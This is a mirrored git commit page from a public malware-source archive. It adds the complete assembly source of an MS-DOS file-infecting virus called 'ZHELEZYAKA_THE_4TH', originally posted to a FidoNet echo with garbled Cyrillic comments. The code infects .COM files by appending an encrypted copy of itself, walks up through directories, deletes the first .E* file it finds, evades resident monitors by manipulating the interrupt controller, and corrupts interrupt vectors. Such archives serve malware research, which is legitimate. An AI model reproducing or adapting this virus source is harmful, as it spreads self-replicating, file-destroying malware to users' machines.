daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

re-organize

Browse Source 
push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/V-Index/Virus.MSDOS.Unknown.vir01.asm
+369
View File
@@ -0,0 +1,369 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 1 of 64
; From : MeteO 2:5030/136 Tue 09 Nov 93 08:59
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : ViRii
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : ABC.PVT.HACK (ABC: • æª...)
;* From : Alexei Galich, 123:1000/6.2 (31 Oct 94 13:44)
;* To : All
;* Subj : ViRii
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;p¨¢¥âáâ¢yî ‚ á, All
;
;‚®â ¢¨pyá ­ ¯¨á «, áâp è­ë©, á ¬ ¯¨á « !
;H ¥§¤ë ¯p¨­¨¬ îâáï á 1:00-8:00
;
;PS: Hy ­¥ §­ î ï ¯®ç¥¬y ®­ â ¡y«îæ¨î ­¥ ¯®­ï«, ¨§¢¨­¨â¥.
;
;--------8<-------------------------------------------------------
;
;
; ZHELEZYAKA_THE_4TH
IDEAL
MODEL TINY
CODESEG
ORG 100H
LOCALS
MAIN_BEGIN: JMP VIRUS_START_O
DB 04H,0,' ZHELEZYAKA_THE_4TH ',0
EXIT_ADDRESS EQU 100H
DOS EQU 21H
VIRUS_SIGNATURE EQU 04H
NUM_FIRST_BYTES EQU 4
ALREADY_INFECT EQU 3
COUNTER_ADDR EQU 510H
FALSE_BYTE_ADDR EQU 104H
COM_WILDCARD EQU (COM_WILDCARD_O-VIRUS_START_O)
EXE_WILDCARD EQU (EXE_WILDCARD_O-VIRUS_START_O)
WRITE_BUFFER EQU (WRITE_BUFFER_O-VIRUS_START_O)
ORIGIN_DIR EQU (WRITE_BUFFER+NUM_FIRST_BYTES)
NEW_DTA EQU (ORIGIN_DIR+65)
COPY_BUFFER EQU (NEW_DTA+256)
FALSE_BYTES EQU (COPY_BUFFER+WRITE_BUFFER)
ORIGIN_BEGIN EQU (ORIGIN_BEGIN_O-VIRUS_START_O)
MAIN_PART_LEN EQU (WRITE_BUFFER)
INFECTED_NUMB EQU (INFECTED_NUMB_O-VIRUS_START_O)
XOR_VALUE EQU (XOR_VALUE_O-VIRUS_START_O)
XOR_VAL0 EQU (XOR_VAL0_O-VIRUS_START_O)
XOR_VAL00 EQU (XOR_VAL00_O-VIRUS_START_O)
XOR_VAL1 EQU (XOR_VAL1_O-VIRUS_START_O)
XOR_VAL2 EQU (XOR_VAL2_O-VIRUS_START_O)
XOR_VAL3 EQU (XOR_VAL3_O-VIRUS_START_O)
XOR_VAL4 EQU (XOR_VAL4_O-VIRUS_START_O)
BEGIN_CODING EQU (BEGIN_CODING_O-VIRUS_START_O)
CONT_CODING EQU (CONT_CODING_O-VIRUS_START_O)
MESSAGE EQU (MESSAGE_O-VIRUS_START_O)
DOT EQU (DOT_O-VIRUS_START_O)
VIRUS_START_O: CALL DETECT_BEGIN_O
XOR_VAL0_O DB 0
DETECT_BEGIN_O: POP SI
SUB SI,3 ; SI -  ç «® ¢¨àãá 
JMP SHORT @@0
XOR_VAL00_O DB 0
@@0: LEA DI,[SI+BEGIN_CODING]
CALL CODE
BEGIN_CODING_O =$
MOV CX,NUM_FIRST_BYTES ; ‹¥ç¨¬
LEA DI,[SI+ORIGIN_BEGIN] ; ä ©«
MOV BX,100H ; ¢
MOVE_LOOP: MOV AH,[DI] ; ¯ ¬ïâ¨
MOV [BX],AH ;
INC DI ;
INC BX ;
LOOP MOVE_LOOP ;
LEA DX,[SI+NEW_DTA] ; ‘â ¢¨¬
MOV AH,1AH ; ᢮î
CALL CHECK ; DTA
MOV AH,47H ;
PUSH SI ; ‡ ¯®¬¨­ ¥¬
LEA SI,[SI+ORIGIN_DIR+1] ; ⥪ã騩
CWD ; ª â «®£
CALL CHECK ;
POP SI ;
FIND_FIRST: LEA DX,[SI+COM_WILDCARD] ; ®¨áª ¯¥à¢®£®
XOR CX,CX ; COM ä ©« 
MOV AH,4EH ;
FIND_NEXT: INT DOS ;
JNC @@L1 ;
JMP NO_FILES_FOUND ; …᫨ ­¥â, â® ...
@@L1:
LEA DX,[SI+NEW_DTA+1EH] ; Žâªà®¥¬
MOV AX,3D02H ; íâ®â
CALL CHECK ; ä ©«
MOV BX,AX ; à®ç¨â ¥¬
MOV AH,3FH ; ¯¥à¢ë¥ 4
LEA DX,[SI+ORIGIN_BEGIN] ; ¡ ©â 
MOV DI,DX ; ¨§
MOV CX,NUM_FIRST_BYTES ; í⮣®
INT DOS ; ä ©« 
ADD DI,NUM_FIRST_BYTES-1
CMP [BYTE PTR DI],VIRUS_SIGNATURE
JE @@L2
JMP INFECT_FILE
@@L2:
MOV AH,3EH ; ‡ ªà®¥¬
CALL CHECK ; ä ©«
CONT_SEARCHING: MOV AH,4FH ;  ©â¨
JMP FIND_NEXT ; á«¥¤ãî騩 ä ©«
COM_WILDCARD_O DB '*.COM',0
EXE_WILDCARD_O DB '*.E*',0
MESSAGE_O DB 13,10,'ZHELEZYAKA_THE_4TH WITH YOU FOREVER',13,10,'$'
DOT_O DB '..',0
NO_FILES_FOUND: MOV AH,3BH ; ‘¬¥é ¥¬áï
LEA DX,[SI+DOT] ; ­  ª â «®£
INT DOS ; ¢¢¥àå
JC @@L4 ; ¯®ª 
JMP FIND_FIRST ; ¢®§¬®¦­®
@@L4:
XOR AX,AX ;
MOV ES,AX ; “¢¥«¨ç¨¢ ¥¬
MOV DI,COUNTER_ADDR ; áç¥â稪
MOV AX,[ES:DI] ;
INC AL ;
MOV [ES:DI],AX ; —â®
CMP AL,ALREADY_INFECT ; ¡ã¤¥¬
JG INFECT_MORE ; ¤¥« âì?
CMP AH,ALREADY_INFECT-2 ;
JG BANNER ;
JMP EXECUTE_PROG ;
BANNER: XOR AX,AX ; ‘¡à®á áç¥â稪 
MOV [ES:DI],AX
LEA DX,[SI+MESSAGE] ; ‚뢮¤
MOV AH,9 ; á®®¡é¥­¨ï
CALL CHECK ;
MOV CX,5 ;
CONTINUE_NOISE: MOV DL,7 ; ¨áª
MOV AH,2 ;
INT DOS ;
LOOP CONTINUE_NOISE
JMP EXECUTE_PROG
INFECT_MORE: XOR AL,AL ; ‘â¨à ­¨¥ ¯¥à¢®£® .E* ä ©« 
INC AH
MOV [ES:DI],AX
LEA DI,[SI+ORIGIN_DIR] ;
MOV [BYTE PTR DI],'\' ; ‚®ááâ ­ ¢«¨¢ ¥¬
MOV AH,3BH ; áâ àë©
XCHG DX,DI ; ª â «®£
INT DOS ;
LEA DX,[SI+EXE_WILDCARD]
XOR CX,CX
MOV AH,4EH
INT DOS
JC EXECUTE_PROG
LEA DX,[SI+NEW_DTA+1EH]
MOV AH,41H
INT 21H
EXECUTE_PROG: MOV DX,80H ; ‘â ¢¨¬
MOV AH,1AH ; áâ àãî
INT DOS ; DTA
LEA DI,[SI+ORIGIN_DIR] ;
MOV [BYTE PTR DI],'\' ; ‚®ááâ ­ ¢«¨¢ ¥¬
MOV AH,3BH ; áâ àë©
XCHG DX,DI ; ª â «®£
INT DOS ;
MOV AX,DS
MOV ES,AX
MOV BP,100H ;
JMP BP ;
INFECT_FILE:
XOR AL,AL ;
MOV AH,[BYTE PTR SI+XOR_VALUE] ;
@@IFZERO: INC AH ;
JZ @@IFZERO ; ®¤£®â ¢«¨¢ ¥¬
MOV [BYTE PTR SI+XOR_VALUE],AH ; ­®¢ë©
MOV [SI+XOR_VAL0],AH ; ª®¤
MOV [SI+XOR_VAL00],AH ;
MOV [SI+XOR_VAL1],AH ;
MOV [SI+XOR_VAL2],AH ;
MOV [SI+XOR_VAL3],AH ;
MOV [SI+XOR_VAL4],AH ;
MOV AX,5700H ; ‡ ¯®¬¨­ ¥¬
CALL CHECK ; ¢à¥¬ï
PUSH CX ; ᮧ¤ ­¨ï
PUSH DX ;
XOR CX,CX ; ˆ¤¥¬
XOR DX,DX ; ­ 
MOV AX,4202H ; ª®­¥æ
CALL CHECK ; ä ©« 
SUB AX,3 ; ®¤£®â ¢«¨¢ ¥¬
MOV [BYTE PTR SI+WRITE_BUFFER],0E9H ; ­®¢ë¥
MOV [SI+WRITE_BUFFER+1],AX ; 4 ¡ ©â 
MOV [BYTE PTR SI+WRITE_BUFFER+3],VIRUS_SIGNATURE
MOV CX,MAIN_PART_LEN ;
MOV DI,SI ; Š®¯¨à㥬
COPY_LOOP: MOV AH,[DI] ; ¢¨àãá
MOV [DI+COPY_BUFFER],AH ; ¢
INC DI ; ¡ãää¥à
LOOP COPY_LOOP ;
LEA DI,[SI+COPY_BUFFER+BEGIN_CODING] ; Š®¤¨à㥬
CALL CODER_DECODER ; ¥£®
LEA DI,[SI+COPY_BUFFER+CONT_CODING]
CALL FIRST_CODE
MOV CX,MAIN_PART_LEN ; ®¤¡¨à ¥¬
MOV AL,[BYTE PTR FALSE_BYTE_ADDR] ; ¤«¨­ã
ADD AL,[FALSE_BYTES] ;
XOR AH,AH ;
ADD CX,AX ; ¨è¥¬
LEA DX,[SI+COPY_BUFFER] ; £« ¢­ãî
MOV AH,40H ; ç áâì
INT DOS ; ¢¨àãá 
XOR CX,CX ; ˆ¤¥¬
XOR DX,DX ; ­ 
MOV AX,4200H ; ­ ç «®
CALL CHECK ; ä ©« 
MOV CX,NUM_FIRST_BYTES ; ˆá¯à ¢«ï¥¬
LEA DX,[SI+WRITE_BUFFER] ; ¯¥à¢ë¥
MOV AH,40H ; ¡ ©âë
INT DOS ; ä ©« 
POP DX ; ‚®ááâ ­ ¢«¨¢ ¥¬
POP CX ; ¢à¥¬ï
MOV AX,5701H ; ᮧ¤ ­¨ï
CALL CHECK ;
MOV AH,3EH ; ‡ ªà뢠¥¬
INT DOS ; ä ©«
CALL CODE_INT
JMP EXECUTE_PROG
ORIGIN_BEGIN_O DB 0CDH,20H,90H,90H
CONT_CODING_O =$
CODER_DECODER: MOV CX,CODER_DECODER-BEGIN_CODING_O-1
MOV AH,[SI+XOR_VALUE]
XOR AL,AL
OUT 21H,AL
CODING_LOOP: IN AL,21H
ADD AL,AH
XOR [DI],AL ;  ¬
INC DI ; ª®¤¨à®¢é¨ª
ADD AL,[FALSE_BYTE_ADDR]
OUT 21H,AL ;
LOOP CODING_LOOP ;
XOR AL,AL
OUT 21H,AL
RET
CHECK: PUSH AX ; «®ª¨à®¢ª  ¯à¥à뢠­¨ï
PUSHF
MOV AL,0FEH
OUT 21H,AL
MOV AH,4FH
POPF
POP AX
INT 21H
PUSH AX
PUSHF
IN AL,21H
CMP AL,0FEH
@@HALT: JNE @@HALT
XOR AL,AL
OUT 21H,AL
POPF
POP AX
RET
CODE_INT: XOR AX,AX ; Š®¤¨à®¢ ­¨¥ INT 0 - 3
MOV ES,AX
MOV CX,12
COD_INT_CON: MOV BX,CX
XOR [BYTE PTR ES:BX],10101010B
LOOP COD_INT_CON
PUSH CS
POP ES
RET
; ------------
FIRST_CODE: MOV CX,FIRST_CODE-CODER_DECODER ; ।¢ à¨â¥«ì­ë©
MOV AH,[SI+XOR_VALUE] ; ª®¤¨à®¢é¨ª
JMP SHORT FIRST_COD_LOOP
XOR_VAL1_O DB 0
FIRST_COD_LOOP: XOR [DI],AH
INC DI
JMP SHORT @@2
XOR_VAL2_O DB 0
@@2: LOOP FIRST_COD_LOOP
RET
XOR_VALUE_O DB 0
CODE: PUSH DI
LEA DI,[SI+CONT_CODING]
JMP @@3
XOR_VAL3_O DB 0
@@3: CALL FIRST_CODE
MOV AH,40H
JMP @@4
XOR_VAL4_O DB 0
@@4: CALL CHECK ; —â®¡ë ®¡¬ ­ãâì ¯¥à¥å¢ â稪
CALL CODE_INT
POP DI
JMP SHORT CODER_DECODER
WRITE_BUFFER_O =$
END MAIN_BEGIN
;---------------8<-------------------------------------------------
;
;- ‚ᥠíâ® ¡ë«® ¡ë ¯p¨ª®«ì­®, ª®£¤  ¡ë ­¥ ¡ë«® â ª ¡®«ì­®.
;
; -= iR0NMAN =-
;
;-+- GoldED 2.50.B1016+
; + Origin: Œ…H’Ž‚Š€ - ’Ž €‡„HˆŠ !!! (123:1000/6.2)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/p Check for code segment overrides in protected mode
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)